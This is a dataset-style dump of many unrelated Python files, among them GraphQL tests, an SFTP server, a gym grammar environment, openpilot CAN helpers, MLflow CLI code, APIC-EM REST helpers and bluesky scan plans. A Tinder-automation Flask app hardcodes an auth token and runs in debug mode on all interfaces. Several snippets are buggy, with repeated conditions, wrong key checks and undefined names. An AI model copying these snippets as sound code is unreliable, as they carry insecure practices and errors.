content='abc',
headers={
'Content-Type': 'foo',
'Content-Disposition': 'bar'
}
)
url = reverse('suppliers-csv-dump')
response = client.get(url+'?token=debug')
assert mocked_api_client.supplier.get_csv_dump.called is True
assert mocked_api_client.supplier.get_csv_dump.called_once_with(
token='debug'
)
assert response.content == b'abc'
assert response.headers['Content-Type'] == ('foo')
assert response.headers['Content-Disposition'] == ('bar')
|
15,120 | cc4f8ae28425cf2e1469bea62fec559e615d0403 | from unittest.mock import Mock
from graphql import graphql
from ariadne import make_executable_schema, resolve_to
def test_query_root_type_default_resolver():
type_defs = """
type Query {
test: String
}
"""
resolvers = {"Query": {"test": lambda *_: "success"}}
schema = make_executable_schema(type_defs, resolvers)
result = graphql(schema, "{ test }")
assert result.errors is None
assert result.data == {"test": "success"}
def test_query_custom_type_default_resolver():
type_defs = """
type Query {
test: Custom
}
type Custom {
node: String
}
"""
resolvers = {"Query": {"test": lambda *_: {"node": "custom"}}}
schema = make_executable_schema(type_defs, resolvers)
result = graphql(schema, "{ test { node } }")
assert result.errors is None
assert result.data == {"test": {"node": "custom"}}
def test_query_custom_type_object_default_resolver():
type_defs = """
type Query {
test: Custom
}
type Custom {
node: String
}
"""
resolvers = {"Query": {"test": lambda *_: Mock(node="custom")}}
schema = make_executable_schema(type_defs, resolvers)
result = graphql(schema, "{ test { node } }")
assert result.errors is None
assert result.data == {"test": {"node": "custom"}}
def test_query_custom_type_custom_resolver():
type_defs = """
type Query {
test: Custom
}
type Custom {
node: String
}
"""
resolvers = {
"Query": {"test": lambda *_: {"node": "custom"}},
"Custom": {"node": lambda *_: "deep"},
}
schema = make_executable_schema(type_defs, resolvers)
result = graphql(schema, "{ test { node } }")
assert result.errors is None
assert result.data == {"test": {"node": "deep"}}
def test_query_custom_type_merged_custom_default_resolvers():
type_defs = """
type Query {
test: Custom
}
type Custom {
node: String
default: String
}
"""
resolvers = {
"Query": {"test": lambda *_: {"node": "custom", "default": "ok"}},
"Custom": {"node": lambda *_: "deep"},
}
schema = make_executable_schema(type_defs, resolvers)
result = graphql(schema, "{ test { node default } }")
assert result.errors is None
assert result.data == {"test": {"node": "deep", "default": "ok"}}
def test_query_with_argument():
type_defs = """
type Query {
test(returnValue: Int!): Int
}
"""
def resolve_test(*_, returnValue):
assert returnValue == 4
return "42"
resolvers = {"Query": {"test": resolve_test}}
schema = make_executable_schema(type_defs, resolvers)
result = graphql(schema, "{ test(returnValue: 4) }")
assert result.errors is None
assert result.data == {"test": 42}
def test_query_with_input():
type_defs = """
type Query {
test(data: TestInput): Int
}
input TestInput {
value: Int
}
"""
def resolve_test(*_, data):
assert data == {"value": 4}
return "42"
resolvers = {"Query": {"test": resolve_test}}
schema = make_executable_schema(type_defs, resolvers)
result = graphql(schema, "{ test(data: { value: 4 }) }")
assert result.errors is None
assert result.data == {"test": 42}
def test_mapping_resolver():
type_defs = """
type Query {
user: User
}
type User {
firstName: String
}
"""
resolvers = {
"Query": {"user": lambda *_: {"first_name": "Joe"}},
"User": {"firstName": resolve_to("first_name")},
}
schema = make_executable_schema(type_defs, resolvers)
result = graphql(schema, "{ user { firstName } }")
assert result.errors is None
assert result.data == {"user": {"firstName": "Joe"}}
def test_mapping_resolver_to_object_attribute():
type_defs = """
type Query {
user: User
}
type User {
firstName: String
}
"""
resolvers = {
"Query": {"user": lambda *_: Mock(first_name="Joe")},
"User": {"firstName": resolve_to("first_name")},
}
schema = make_executable_schema(type_defs, resolvers)
result = graphql(schema, "{ user { firstName } }")
assert result.errors is None
assert result.data == {"user": {"firstName": "Joe"}}
def test_default_resolver(mock_user, first_name, avatar, blog_posts):
type_defs = """
type Query {
user: User
}
type User {
firstName: String
avatar(size: String): String
blogPosts(published: Boolean): Int
}
"""
resolvers = {
"Query": {"user": lambda *_: mock_user},
"User": {
"firstName": resolve_to("first_name"),
"blogPosts": resolve_to("blog_posts"),
},
}
schema = make_executable_schema(type_defs, resolvers)
query = """
query User($size: String, $published: Boolean) {
user {
firstName
avatar(size: $size)
blogPosts(published: $published)
}
}
"""
variables = {"size": "200x300", "published": True}
result = graphql(schema, query, variables=variables)
assert result.errors is None
assert result.data == {
"user": {"firstName": first_name, "avatar": avatar, "blogPosts": blog_posts}
}
mock_user.avatar.assert_called_with(size=variables["size"])
mock_user.blog_posts.assert_called_once_with(published=variables["published"])
|
15,121 | 26a302aaa964964b1aaed0b449ca18f559e60a82 | ###############################################################################
#
# Copyright (c) 2011-2017 Ruslan Spivak
# Copyright (c) 2020 Steven Fernandez <steve@lonetwin.net>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
###############################################################################
__author__ = 'Steven Fernandez <steve@lonetwin.net>'
import argparse
import logging
import os
import pwd
import socket
import sys
import paramiko
from sftpserver.stub_sftp import StubSFTPServer, ssh_server
# - Defaults
HOST, PORT = 'localhost', 3373
ROOT = StubSFTPServer.ROOT
LOG_LEVEL = logging.getLevelName(logging.INFO)
MODE = 'threaded'
BACKLOG = 10
def setup_logging(level, mode):
if mode == 'threaded':
log_format = logging.BASIC_FORMAT
else:
log_format = '%(process)d:' + logging.BASIC_FORMAT
logging.basicConfig(format=log_format)
# - setup paramiko logging
paramiko_logger = logging.getLogger('paramiko')
paramiko_logger.setLevel(logging.INFO)
logger = logging.getLogger(__name__)
logger.setLevel(level)
return logger
def setup_transport(connection):
transport = paramiko.Transport(connection)
transport.add_server_key(StubSFTPServer.KEY)
transport.set_subsystem_handler('sftp', paramiko.SFTPServer, StubSFTPServer)
transport.start_server(server=ssh_server)
return transport
def start_server(host=HOST, port=PORT, root=ROOT, keyfile=None, level=LOG_LEVEL, mode=MODE):
logger = setup_logging(level, mode)
if keyfile is None:
server_key = paramiko.RSAKey.generate(bits=1024)
else:
server_key = paramiko.RSAKey.from_private_key_file(keyfile)
StubSFTPServer.ROOT = root
StubSFTPServer.KEY = server_key
logger.debug('Serving %s over sftp at %s:%s', root, host, port)
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, True)
server_socket.bind((host, port))
server_socket.listen(BACKLOG)
sessions = []
while True:
connection, _ = server_socket.accept()
if mode == 'forked':
logger.debug('Starting a new process')
pid = os.fork()
if pid == 0:
transport = setup_transport(connection)
channel = transport.accept()
if os.geteuid() == 0:
user = pwd.getpwnam(transport.get_username())
logger.debug('Dropping privileges, will run as %s', user.pw_name)
os.setgid(user.pw_gid)
os.setuid(user.pw_uid)
transport.join()
logger.debug("session for %s has ended. Exiting", user.pw_name)
sys.exit()
else:
sessions.append(pid)
pid, _ = os.waitpid(-1, os.WNOHANG)
if pid:
sessions.remove(pid)
else:
logger.debug('Starting a new thread')
transport = setup_transport(connection)
channel = transport.accept()
sessions.append(channel)
logger.debug('%s active sessions', len(sessions))
def main():
usage = """usage: sftpserver [options]"""
parser = argparse.ArgumentParser(usage=usage)
parser.add_argument(
'--host', dest='host', default=HOST,
help='listen on HOST [default: %(default)s]'
)
parser.add_argument(
'-p', '--port', dest='port', type=int, default=PORT,
help='listen on PORT [default: %(default)d]'
)
parser.add_argument(
'-l', '--level', dest='level', default=LOG_LEVEL,
help='Debug level: WARNING, INFO, DEBUG [default: %(default)s]'
)
parser.add_argument(
'-k', '--keyfile', dest='keyfile', metavar='FILE',
help='Path to private key, for example /tmp/test_rsa.key'
)
parser.add_argument(
'-r', '--root', dest='root', default=ROOT,
help='Directory to serve as root for the server'
)
parser.add_argument(
'-m', '--mode', default=MODE, const=MODE, nargs='?', choices=('threaded', 'forked'),
help='Mode to run server in [default: %(default)s]'
)
args = parser.parse_args()
if not os.path.isdir(args.root):
parser.print_help()
sys.exit(-1)
start_server(args.host, args.port, args.root, args.keyfile, args.level, args.mode)
if __name__ == '__main__':
main()
|
15,122 | 8c4c03066fe896c721ca84d123dc2512616fe55c | import logging
import gym
from gym import error, spaces, utils
from gym.utils import seeding
import numpy as np
logger = logging.getLogger(__name__)
class TomitaE(gym.Env):
"""
Tomita Grammer : even number of 0's and even number of 1s
Alphabet : {0,1}
"""
metadata = {'render.modes': ['human']}
def __init__(self):
self.alphabet = [0, 1]
self.total_actions = 2 # 0: Reject ; 1: Accept
self.accept_action = 1
self.reject_action = 0
self.action_space = spaces.Discrete(self.total_actions)
self._clock = None
self.seed()
self.min_steps = 1
self.max_steps = 50
self.enc = True
self.all_observations = []
self._enforce_valid_string = True
self._counts = [0, 0] # each alphabet count
def step(self, action):
if action >= self.total_actions:
raise ValueError("action must be one of %r" % range(self.total_actions))
self._clock += 1
done = True if self._clock >= self.max_episode_steps else False
reward = 1 if done and self.get_desired_action() == action else 0
next_obs = self._get_observation() if not done else self._get_random_observation()
info = {'desired_action': self.get_desired_action() if not done else None}
return next_obs, reward, done, info
def _get_random_observation(self):
return self.np_random.choice(self.alphabet)
def _get_observation(self):
if self._enforce_valid_string:
obs = self._generated_obs[self._clock]
# if self._clock > 0:
# prob = [self._counts[1] / sum(self._counts), self._counts[0] / sum(self._counts)]
# else:
# prob = [0.5, 0.5]
# obs = self.np_random.choice(self.alphabet, p=prob)
else:
obs = self.np_random.choice(self.alphabet, p=self._probs)
self.all_observations.append(obs)
self._counts[obs] += 1
return np.array([obs])
def get_desired_action(self):
return self.accept_action if self.is_string_valid() else self.reject_action
def is_string_valid(self):
return self._counts[0] % 2 == 0 and self._counts[1] % 2 == 0
def reset(self):
self._clock = 0
self._enforce_valid_string = (self.np_random.random_sample() <= 0.4) # Equally sample Accept and Reject
if self._enforce_valid_string:
obs = self.np_random.choice([0, 1])
obs_count = self.np_random.choice(range(2, self.max_steps, 2))
non_obs_count = self.np_random.choice(range(0, self.max_steps - obs_count + 1, 2))
self._generated_obs = [obs] * obs_count
self._generated_obs += [1 - obs] * non_obs_count
self.np_random.shuffle(self._generated_obs)
self.max_episode_steps = len(self._generated_obs)
else:
self.max_episode_steps = self.np_random.choice(range(self.min_steps, self.max_steps + 1))
self._probs = self.np_random.random_sample()
self._probs = [self._probs, 1 - self._probs]
self.np_random.shuffle(self._probs)
self.all_observations = []
self._counts = [0, 0] # each alphabet count
obs = self._get_observation()
return obs
def close(self):
pass
def seed(self, seed=None):
self.np_random, seed1 = seeding.np_random(seed)
seed2 = seeding.hash_seed(seed1 + 1) % 2 ** 31
return [seed1, seed2]
def render(self, mode="human", close=False):
pass
|
15,123 | 3f26a4f6f584b1ee8e69e248d03b44840c47968f | s1 = {1, 2, 3, 4}
print(s1)
item = 2
if item in s1:
s1.remove(item)
print(s1)
s1.discard(10)
print(s1)
|
15,124 | bc1034e482149a49f768c30eec8b0dc4f41ab0fc | import copy
from cereal import car
VisualAlert = car.CarControl.HUDControl.VisualAlert
def create_steering_control(packer, apply_steer, frame, steer_step):
idx = (frame / steer_step) % 16
values = {
"Counter": idx,
"LKAS_Output": apply_steer,
"LKAS_Request": 1 if apply_steer != 0 else 0,
"SET_1": 1
}
return packer.make_can_msg("ES_LKAS", 0, values)
def create_steering_status(packer, apply_steer, frame, steer_step):
return packer.make_can_msg("ES_LKAS_State", 0, {})
def create_es_distance(packer, es_distance_msg, pcm_cancel_cmd):
values = copy.copy(es_distance_msg)
if pcm_cancel_cmd:
values["Cruise_Cancel"] = 1
return packer.make_can_msg("ES_Distance", 0, values)
def create_es_lkas(packer, es_lkas_msg, visual_alert, left_line, right_line):
values = copy.copy(es_lkas_msg)
if visual_alert == VisualAlert.steerRequired:
values["Keep_Hands_On_Wheel"] = 1
values["LKAS_Left_Line_Visible"] = int(left_line)
values["LKAS_Right_Line_Visible"] = int(right_line)
return packer.make_can_msg("ES_LKAS_State", 0, values)
# *** Subaru Pre-global ***
def subaru_preglobal_checksum(packer, values, addr):
dat = packer.make_can_msg(addr, 0, values)[2]
return (sum(dat[:7])) % 256
def create_preglobal_steering_control(packer, apply_steer, frame, steer_step):
idx = (frame / steer_step) % 8
values = {
"Counter": idx,
"LKAS_Command": apply_steer,
"LKAS_Active": 1 if apply_steer != 0 else 0
}
values["Checksum"] = subaru_preglobal_checksum(packer, values, "ES_LKAS")
return packer.make_can_msg("ES_LKAS", 0, values)
def create_es_throttle_control(packer, fake_button, es_accel_msg):
values = copy.copy(es_accel_msg)
values["Button"] = fake_button
values["Checksum"] = subaru_preglobal_checksum(packer, values, "ES_CruiseThrottle")
return packer.make_can_msg("ES_CruiseThrottle", 0, values)
|
15,125 | 4a69780f15ac017905a292691ff4a39559bc9e13 | from flask import Flask, render_template, request
import urllib
import json
from PIL import Image
import numpy as np
app = Flask(__name__)
TOKEN = '4b25cd19-cfa6-46b0-9c16-67745a6ca844'
@app.route('/likes', methods=['GET'])
def likes():
token = TOKEN if request.args.get(
'token') is None else request.args.get('token')
url = 'https://api.gotinder.com/v2/fast-match/teasers'
data = get_data(token, url)
return render_template('likes.html', data=data.get('data').get('results'), token=token)
@app.route('/search', methods=['GET'])
def search():
token = TOKEN if request.args.get(
'token') is None else request.args.get('token')
url = 'https://api.gotinder.com/v2/recs/core'
data = get_data(token, url)
return render_template('search.html', data=data.get('data').get('results'), token=token)
@app.route('/match', methods=['GET'])
def match():
token = TOKEN if request.args.get(
'token') is None else request.args.get('token')
id = request.args.get('id')
url = 'https://api.gotinder.com/like/{}'.format(id)
get_data(token, url)
return "NEW MATCH!!!"
@app.route('/auto-match', methods=['GET'])
def auto_match():
count = 0
token = TOKEN if request.args.get(
'token') is None else request.args.get('token')
url = 'https://api.gotinder.com/v2/fast-match/teasers'
likes = get_data(token, url).get('data').get('results')
url = 'https://api.gotinder.com/v2/recs/core'
candidates = get_data(token, url).get('data').get('results')
for like in likes:
for candidate in candidates:
for photo in candidate.get('user').get('photos'):
if is_same(like.get('user').get('photos')[0].get('url'), photo.get('url')):
url = 'https://api.gotinder.com/like/{}'.format(
candidate.get('user').get('_id'))
get_data(token, url)
count += 1
break
response = "{} NEW MATCHS!!!" if count > 1 else "{} NEW MATCH!!!"
response += " Try again" if count == 0 else ""
return response.format(count)
def get_data(token, url):
headers = {}
headers['X-Auth-Token'] = token
request = urllib.request.Request(url, headers=headers)
response = urllib.request.urlopen(request).read()
data = json.loads(response.decode("utf-8"))
return data
def exclude_profile_list(data, id):
try:
index = [item['user']['_id']
for item in data['data']['results']].index(id)
del data['data']['results'][index]
except:
pass
return data
def is_same(url1, url2):
try:
size = (300, 300)
image1 = Image.open(urllib.request.urlopen(url1))
image2 = Image.open(urllib.request.urlopen(url2))
return list(image1.getdata()) == list(image2.getdata())
except:
return False
if __name__ == "__main__":
app.run(host='0.0.0.0', debug=True)
|
15,126 | f1abd07653d5b9722f8018f48bc5e5a00dbcd47d | def fn():
l,m,n = map(int,input().strip().split())
a = list(map(int,input().strip().split()))
b = list(map(int,input().strip().split()))
c = list(map(int,input().strip().split()))
a1 = set(a)
b1 = set(b)
c1 = set(c)
out1 = {}
out2 = {}
out1 = a1.intersection(b1)
out2 = out1.intersection(c1)
if len(out2) != 0:
print(*sorted(out2))
else:
print("-1")
for _ in range(int(input().strip())):
fn()
|
15,127 | 3085d80835e0cb3ce9c5816d36a3eea56e3f7b28 | from __future__ import absolute_import
import os
from six.moves import shlex_quote
import subprocess
import sys
import click
import pandas
from mlflow.pyfunc import load_pyfunc, scoring_server, _load_model_env
from mlflow.tracking.utils import _get_model_log_dir
from mlflow.utils import cli_args
from mlflow.utils.logging_utils import eprint
from mlflow.projects import _get_conda_bin_executable, _get_or_create_conda_env
def _rerun_in_conda(conda_env_path):
""" Rerun CLI command inside a to-be-created conda environment."""
conda_env_name = _get_or_create_conda_env(conda_env_path)
activate_path = _get_conda_bin_executable("activate")
commands = []
commands.append("source {} {}".format(activate_path, conda_env_name))
safe_argv = [shlex_quote(arg) for arg in sys.argv]
commands.append(" ".join(safe_argv) + " --no-conda")
commandline = " && ".join(commands)
eprint("=== Running command '{}'".format(commandline))
child = subprocess.Popen(["bash", "-c", commandline], close_fds=True)
exit_code = child.wait()
return exit_code
@click.group("pyfunc")
def commands():
"""
Serve Python models locally.
To serve a model associated with a run on a tracking server, set the MLFLOW_TRACKING_URI
environment variable to the URL of the desired server.
"""
pass
@commands.command("serve")
@cli_args.MODEL_PATH
@cli_args.RUN_ID
@click.option("--port", "-p", default=5000, help="Server port. [default: 5000]")
@click.option("--host", "-h", default="127.0.0.1", help="Server host. [default: 127.0.0.1]")
@cli_args.NO_CONDA
def serve(model_path, run_id, port, host, no_conda):
"""
Serve a PythonFunction model saved with MLflow.
If a ``run_id`` is specified, ``model-path`` is treated as an artifact path within that run;
otherwise it is treated as a local path.
"""
if run_id:
model_path = _get_model_log_dir(model_path, run_id)
model_env_file = _load_model_env(model_path)
if not no_conda and model_env_file is not None:
conda_env_path = os.path.join(model_path, model_env_file)
return _rerun_in_conda(conda_env_path)
app = scoring_server.init(load_pyfunc(model_path))
app.run(port=port, host=host)
@commands.command("predict")
@cli_args.MODEL_PATH
@cli_args.RUN_ID
@click.option("--input-path", "-i", help="CSV containing pandas DataFrame to predict against.",
required=True)
@click.option("--output-path", "-o", help="File to output results to as CSV file." +
" If not provided, output to stdout.")
@cli_args.NO_CONDA
def predict(model_path, run_id, input_path, output_path, no_conda):
"""
Load a pandas DataFrame and runs a python_function model saved with MLflow against it.
Return the prediction results as a CSV-formatted pandas DataFrame.
If a ``run-id`` is specified, ``model-path`` is treated as an artifact path within that run;
otherwise it is treated as a local path.
"""
if run_id:
model_path = _get_model_log_dir(model_path, run_id)
model_env_file = _load_model_env(model_path)
if not no_conda and model_env_file is not None:
conda_env_path = os.path.join(model_path, model_env_file)
return _rerun_in_conda(conda_env_path)
model = load_pyfunc(model_path)
df = pandas.read_csv(input_path)
result = model.predict(df)
out_stream = sys.stdout
if output_path:
out_stream = open(output_path, 'w')
pandas.DataFrame(data=result).to_csv(out_stream, header=False, index=False)
|
15,128 | 24518ca38cdc12eb6ce019345983e1cd04702b26 | #Embedded file name: C:\ProgramData\Ableton\Live 9 Suite\Resources\MIDI Remote Scripts\Maschine_Mk1\MaschineChannelStripComponent.py
import Live
from _Framework.ChannelStripComponent import ChannelStripComponent
from _Framework.ButtonElement import ButtonElement
from _Framework.InputControlElement import *
from MIDI_Map import debug_out
class MaschineChannelStripComponent(ChannelStripComponent):
def __init__(self):
ChannelStripComponent.__init__(self)
self.deleted = {}
self.clear_mode = False
self.touch_mode = False
self.send_control = None
self.clear_vol_button = None
self.clear_pan_button = None
self.clear_send_button = None
def set_touch_mode(self, touchchannel):
self.touch_mode = True
id_vol = self._volume_control.message_identifier()
id_pan = self._pan_control.message_identifier()
id_send = None
for send in self._send_controls:
if send:
id_send = send.message_identifier()
self.clear_vol_button = ButtonElement(False, MIDI_CC_TYPE, touchchannel, id_vol)
self.clear_vol_button.add_value_listener(self._do_clear_vol)
self.clear_pan_button = ButtonElement(False, MIDI_CC_TYPE, touchchannel, id_pan)
self.clear_pan_button.add_value_listener(self._do_clear_pan)
self.clear_send_button = ButtonElement(False, MIDI_CC_TYPE, touchchannel, id_send)
self.clear_send_button.add_value_listener(self._do_clear_send)
for send in self._send_controls:
if send:
self.send_control = send
def enter_clear(self):
self.clear_mode = True
self.deleted = {}
if not self.touch_mode:
self.set_enabled(False)
self._volume_control.add_value_listener(self._do_clear_vol)
self._pan_control.add_value_listener(self._do_clear_pan)
for send in self._send_controls:
if send:
self.send_control = send
send.add_value_listener(self._do_clear_send)
def exit_clear(self):
self.clear_mode = False
if not self.touch_mode:
self._volume_control.remove_value_listener(self._do_clear_vol)
self._pan_control.remove_value_listener(self._do_clear_pan)
for send in self._send_controls:
if send:
send.remove_value_listener(self._do_clear_send)
self.set_enabled(True)
def _do_clear_vol(self, value):
key = self._volume_control.message_identifier()
if self.clear_mode and key not in self.deleted:
self.deleted[key] = True
playing_clip = self._get_playing_clip()
if playing_clip:
playing_clip.clear_envelope(self._track.mixer_device.volume)
def _do_clear_pan(self, value):
key = self._pan_control.message_identifier()
if self.clear_mode and key not in self.deleted:
self.deleted[key] = True
playing_clip = self._get_playing_clip()
if playing_clip:
playing_clip.clear_envelope(self._track.mixer_device.panning)
def _do_clear_send(self, value):
key = self.send_control.message_identifier()
if self.clear_mode and key not in self.deleted:
send_index = len(self._send_controls) - 1
self.deleted[key] = True
playing_clip = self._get_playing_clip()
if playing_clip and send_index in range(len(self._track.mixer_device.sends)):
playing_clip.clear_envelope(self._track.mixer_device.sends[send_index])
def _mute_value(self, value):
super(MaschineChannelStripComponent, self)._mute_value(value)
key = self._mute_button.message_identifier()
if self.clear_mode and key not in self.deleted:
self.deleted[key] = True
playing_clip = self._get_playing_clip()
if playing_clip:
playing_clip.clear_envelope(self._track.mixer_device.track_activator)
def _get_playing_clip(self):
if self._track == None:
return
clips_slots = self._track.clip_slots
for cs in clips_slots:
if cs.has_clip and cs.is_playing:
return cs.clip
def disconnect(self):
self.clear_pan_button = None
self.clear_send_button = None
if self.clear_vol_button != None:
self.clear_vol_button.remove_value_listener(self._do_clear_vol)
self.clear_vol_button = None
if self.clear_pan_button != None:
self.clear_pan_button.remove_value_listener(self._do_clear_pan)
self.clear_pan_button = None
if self.clear_send_button != None:
self.clear_send_button.remove_value_listener(self._do_clear_send)
self.clear_send_button = None
if not self.touch_mode and self.clear_mode:
if self.send_control != None:
self.send_control.remove_value_listener(self._do_clear_send)
self.send_control = None
if self._volume_control != None:
self._volume_control.remove_value_listener(self._do_clear_vol)
self._volume_control = None
if self._pan_control != None:
self._pan_control.remove_value_listener(self._do_clear_pan)
self._pan_control = None
super(MaschineChannelStripComponent, self).disconnect() |
15,129 | 4c4caca505d434495e03231b83b651f6e8978751 |
def fun(x,y,op) :
if x and y !=0 and op !=None :
if op == '+':
return x+y
elif op == '+':
return x-y
elif op == '+':
return x*y
else:
return x/y
print(fun(10,15,'+')) |
15,130 | af01ef154f8845436c9b79896006a2477a5e6a25 | """asd"""
class World():
"""Contains details about the physics of a worl"""
name = 'Unknown planet'
acceleration = {}
resistance = {}
propulsors = {}
def __init__(self, name, acceleration, resistance, propulsors):
self.name = name
self.acceleration = acceleration
self.resistance = resistance
self.propulsors = propulsors
def move_object(self, obj, forces):
"""TODO: update an object's properties after moving in this world"""
def shake(self):
"""TODO: do something interesting"""
|
15,131 | a6160186ddf8d26cf679f60d5073d8051343bc79 | import requests
import json
from tabulate import *
import urllib3
version = "v1"
def get_NetworkHostInventory(api_url, ticket):
api_url = api_url + "/api/"+version+"/host"
headers = {
"content-type": "application/json",
"X-Auth-Token": ticket
}
resp = requests.get(api_url, headers=headers, verify=False)
print("Status of /host request: ", resp.status_code)
if resp.status_code != 200:
raise Exception(
"Status code does not equal 200. Response text: " + resp.text)
response_json = resp.json()
host_list = []
i = 0
for item in response_json["response"]:
i += 1
host = [
i,
item["hostType"],
item["hostIp"]
]
host_list.append(host)
table_header = ["Number", "Type", "IP"]
print(tabulate(host_list, table_header))
def get_IPGeolocation(api_url, ticket, ip):
api_url = api_url + "/api/"+version+"/ipgeo/"+ip
headers = {
"content-type": "application/json",
"X-Auth-Token": ticket
}
resp = requests.get(api_url, headers=headers, verify=False)
print("Status of /host request: ", resp.status_code)
if resp.status_code != 200:
raise Exception(
"Status code does not equal 200. Response text: " + resp.text)
response_json = resp.json()
try:
for key, value in response_json["response"][ip].items():
if(value == None):
print(key + "-->DESCONOCIDO")
else:
print(key+"-->"+value)
except Exception as e:
print(e)
def get_FlowAnalysis(api_url, ticket):
api_url = api_url + "/api/"+version+"/flow-analysis"
headers = {
"content-type": "application/json",
"X-Auth-Token": ticket
}
resp = requests.get(api_url, headers=headers, verify=False)
if resp.status_code != 200:
raise Exception(
"Status code does not equal 200. Response text: " + resp.text)
response_json = resp.json()
lista = []
table_header = ["Numero", "IP Origen", "Puerto Origen",
"IP Destino", "Puerto Destino", "Protocolo", "Status"]
i = 1
for item in response_json["response"]:
i += 1
lista.append([
i,
item["sourceIP"],
item["sourcePort"] if "sourcePort" in lista else "---",
item["destIP"],
item["destPort"] if "destPort" in lista else "---",
item["protocol"] if "protocol" in lista else "---",
item["status"]
])
print(tabulate(lista, table_header))
def get_Interfaces(api_url, ticket):
api_url = api_url + "/api/"+version+"/interface"
headers = {
"content-type": "application/json",
"X-Auth-Token": ticket
}
resp = requests.get(api_url, headers=headers, verify=False)
if resp.status_code != 200:
raise Exception(
"Status code does not equal 200. Response text: " + resp.text)
response_json = resp.json()
i = 0
for item in response_json["response"]:
i += 1
print("\n\n=========Interface " + str(i) + " =======")
for key, value in item.items():
if(value != "null" and value != "" and value != None):
print(key + "-->" + value)
|
15,132 | 48bb2ce954839904f5785d7304d56c806fa545f1 | import bluesky.preprocessors as bpp
from bluesky.plan_stubs import sleep, abs_set
import bluesky
from bluesky.plans import rel_spiral_square, rel_spiral_fermat, rel_spiral
from ophyd import EpicsScaler, EpicsSignal
xstart = EpicsSignal(read_pv='HXN{2DStage}XStart-RB', write_pv='HXN{2DStage}XStart')
xstop = EpicsSignal(read_pv='HXN{2DStage}XStop-RB', write_pv='HXN{2DStage}XStop')
ystart = EpicsSignal(read_pv='HXN{2DStage}YStart-RB', write_pv='HXN{2DStage}YStart')
ystop = EpicsSignal(read_pv='HXN{2DStage}YStop-RB', write_pv='HXN{2DStage}YStop')
nx = EpicsSignal(read_pv='HXN{2DStage}NX-RB', write_pv='HXN{2DStage}NX')
ny = EpicsSignal(read_pv='HXN{2DStage}NY-RB', write_pv='HXN{2DStage}NY')
go = EpicsSignal(read_pv='HXN{2DStage}StartScan.PROC', write_pv='HXN{2DStage}StartScan.PROC')
'''
def fly_plan():
"""This is my plan"""
yield from bluesky.plan_stubs.mv(xstart, 0.100)
yield from bluesky.plan_stubs.mv(xstop, 0.200)
yield from bluesky.plan_stubs.mv(ystart, 0.100)
yield from bluesky.plan_stubs.mv(ystop, 0.200)
yield from bluesky.plan_stubs.mv(nx, 3)
yield from bluesky.plan_stubs.mv(ny, 3)
yield from bluesky.plan_stubs.mv(go, 1)
print('hello')
yield from sleep(2)
# Read image: XF:03ID-BI{CAM:1}image1:ArrayData
print('done')
'''
def step_scan(*, detector,
x_motor, y_motor,
x_start=-5, x_end=5, x_num=11,
y_start=-5, y_end=5, y_num=11,
exposure_time=0.01, num_images=1):
yield from bps.mv(detector.cam.num_images, num_images)
yield from bps.mv(flyer.detector.cam.acquire_time, exposure_time)
yield from rel_grid_scan([detector], y_motor, y_start, y_end, y_num, x_motor, x_start, x_end, x_num, False)
def spiral(*, detector,
x_motor, y_motor,
x_range = 1, x_num=11,
y_range = 1, y_num=11,
dr = 0.1, dr_y = None,
nth = 5,
exposure_time=0.01, num_images=1):
yield from bps.mv(detector.cam.num_images, num_images)
yield from bps.mv(flyer.detector.cam.acquire_time, exposure_time)
yield from rel_spiral([det], motor1, motor2, x_range=x_range,y_range=y_range, dr=dr,dr_y= dr_y, nth=nth)
def fermat(*, detector,
x_motor, y_motor,
x_range = 1, x_num=11,
y_range = 1,y_num=11,
dr = 0.1, factor = 1,
exposure_time=0.01, num_images=1):
yield from bps.mv(detector.cam.num_images, num_images)
yield from bps.mv(flyer.detector.cam.acquire_time, exposure_time)
yield from rel_spiral_fermat([det], motor1, motor2,
x_range=x_range, y_range=y_range, dr=dr, factor=factor, tilt=0.0)
def spiral_square(*, detector,
x_motor, y_motor,
x_range = 1, x_num=11,
y_range = 1, y_num=11,
exposure_time=0.01, num_images=1):
yield from bps.mv(detector.cam.num_images, num_images)
yield from bps.mv(flyer.detector.cam.acquire_time, exposure_time)
yield from rel_spiral_square([det], motor1, motor2,x_range=x_range, y_range=y_range, x_num=x_num, y_num=y_num)
'''
def step_scan(*, cam,
x_motor=None, x_start=-5, x_end=5, x_num=11,
y_motor=None, y_start=-5, y_end=5, y_num=11,
exposure_time=0.01):
assert x_motor, 'Provide x_motor object'
assert y_motor, 'Provide y_motor object'
x_home = x_motor.position
y_home = y_motor.position
def move_home():
yield from bps.mov(x_motor, x_home,
y_motor, y_home)
def main():
yield from bps.mov(cam.cam.acquire_time, exposure_time)
yield from bp.grid_scan([cam],
y_motor, y_home+y_start, y_home+y_end, y_num,
x_motor, x_home+x_start, x_home+x_end, x_num,
False)
yield from bps.mov(x_motor, x_home, y_motor, y_home)
yield from bpp.finalize_wrapper(main(), move_home())
'''
|
15,133 | a8de204ea32edd8cfc76ed459535a17d59790bf7 | import json
env_file = "env.json"
info = {"music_home": ""}
def save(file, environment):
f = open(file, 'w')
f.write(json.dumps(environment))
f.close()
def load_json(file):
with open(file) as json_file:
try:
json_data = json.load(json_file)
except ValueError:
print("Error parsing environment file!")
return {}
return json_data
def load_environment():
file = env_file
try:
env = load_json(file)
except IOError:
f = open(file, 'w')
f.close()
env = {}
return env
def wizard(environment):
new_definition = environment
for key, value in environment.items():
if not value:
new_value = input("Enter value for %s: " % key)
new_definition[key] = new_value
return new_definition
def get_environment():
definition = info
environment = load_environment()
definition.update(environment)
